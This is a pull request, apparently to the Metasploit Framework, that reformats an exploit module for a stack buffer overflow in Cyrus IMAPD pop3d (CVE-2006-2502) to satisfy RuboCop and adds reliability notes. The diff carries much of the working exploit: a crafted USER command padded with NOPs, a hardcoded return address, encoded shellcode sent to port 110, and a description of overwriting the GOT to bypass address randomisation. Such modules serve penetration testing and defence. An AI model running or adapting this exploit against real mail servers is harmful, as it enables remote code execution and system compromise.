### PR TITLE
modules/exploits/linux/pop3: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
+++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
@@ -9,27 +9,28 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
+        'Description' => %q{
           This exploit takes advantage of a stack based overflow.  Once the stack
-        corruption has occurred it is possible to overwrite a pointer which is
-        later used for a memcpy. This gives us a write anything anywhere condition
-        similar to a format string vulnerability.
+          corruption has occurred it is possible to overwrite a pointer which is
+          later used for a memcpy. This gives us a write anything anywhere condition
+          similar to a format string vulnerability.
 
-        NOTE: The popsubfolders option is a non-default setting.
+          NOTE: The popsubfolders option is a non-default setting.
 
-        I chose to overwrite the GOT with my shellcode and return to it. This
-        defeats the VA random patch and possibly other stack protection features.
+          I chose to overwrite the GOT with my shellcode and return to it. This
+          defeats the VA random patch and possibly other stack protection features.
 
-        Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
-        a version containing the vulnerable code, it is not exploitable due to the
-        use of the FORTIFY_SOURCE compiler enhancement
-      },
-      'Author'         => [ 'bannedit', 'jduck' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
+          a version containing the vulnerable code, it is not exploitable due to the
+          use of the FORTIFY_SOURCE compiler enhancement.
+        },
+        'Author' => [ 'bannedit', 'jduck' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2006-2502' ],
           [ 'OSVDB', '25853' ],
           [ 'BID', '18056' ],
@@ -37,29 +38,31 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'EDB', '2185' ],
           [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],
         ],
-      'Payload'	=>
-        {
+        'Payload' => {
           'Space'	=> 250,
-          'DisableNops' => true,
+          'DisableNops' => true
         },
-      'Platform'	=> 'linux',
-      'Targets'	=>
-        [
+        'Platform'	=> 'linux',
+        'Targets' => [
           # bannedit: 0x080fd204
           # K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)
           [ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],
         ],
-      'Privileged'		=> true,
-      'DisclosureDate'	=> '2006-05-21',
-      'DefaultTarget'	=> 0))
+        'Privileged'	=> true,
+        'DisclosureDate'	=> '2006-05-21',
+        'DefaultTarget'	=> 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )
 
-    register_options( [ Opt::RPORT(110) ])
+    register_options([ Opt::RPORT(110) ])
   end
 
-
-
   def exploit
-
     connect
     banner = sock.get_once.to_s.strip
 
@@ -72,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # bannedit: 265+8+250+29+16
     shellcode = payload.encoded
 
-    buf = "USER "
+    buf = 'USER '
     buf << make_nops(265)
     # return address
     buf << [target.ret].pack('V') * 2
@@ -85,6 +88,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
     sock.send(buf, 0)
     disconnect
-
   end
 end


### PR DESCRIPTION
All violations resolved with `rubocop -a`, except notes.

